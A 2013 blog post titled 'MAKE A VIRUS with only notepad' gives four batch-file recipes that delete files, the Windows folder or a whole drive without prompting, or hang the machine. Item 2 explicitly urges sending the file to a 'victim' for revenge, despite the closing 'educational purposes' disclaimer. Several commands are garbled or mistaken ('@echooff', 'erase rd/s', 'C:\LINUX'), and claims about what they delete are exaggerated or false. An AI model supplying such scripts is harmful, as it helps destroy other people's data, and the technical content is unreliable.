Sunday 3 November 2013

MAKE A VIRUS with only notepad

Here are some top ways to create viruses and some of them can't be detected by antivirus.

1. 
To delete all folders/files just put this:


DEL /F /Q *
Into notpad and save it as abcd.cmd

It will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something.

WARNING - DO NOT CLICK ON IT WHEN YOU HAVE CREATED IT, IT WILL DESTROY YOUR COMPUTER.





2. 
If you just want to delete the WINDOWS file do this:


Now, to test it, create a textfile called TEST.txt in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes) and save it as "Test.cmd".
Now run the file "Test.cmd" then open up C:\ and you'll see your Test.txt is gone. Now, the real work begins:

Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as abcd.cmd. Now DON'T run the file or you'll lose your WINDOWS files. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX files are gone. And have to install LINUX/WINDOWS again


3. @echooff
erase rd/s /f /q "drive_name:\*.*

example:
@echooff
erase rd/s /f /q c:\*.* 


save it as abcd.cmd
it deletes the entire content of a drive without asking Y/N in the cmd box.


4.write {open123.bat} in notepad and save it as 123.bat. on opening it the computer will hang.



WARNING - I WON'T BE RESPONSIBLE FOE ANY KIND OF DAMAGE OR DATALOSS DONE BY ANYBODY. THIS IS JUST FOR EDUCATIONAL PURPOSES

No comments:

Post a Comment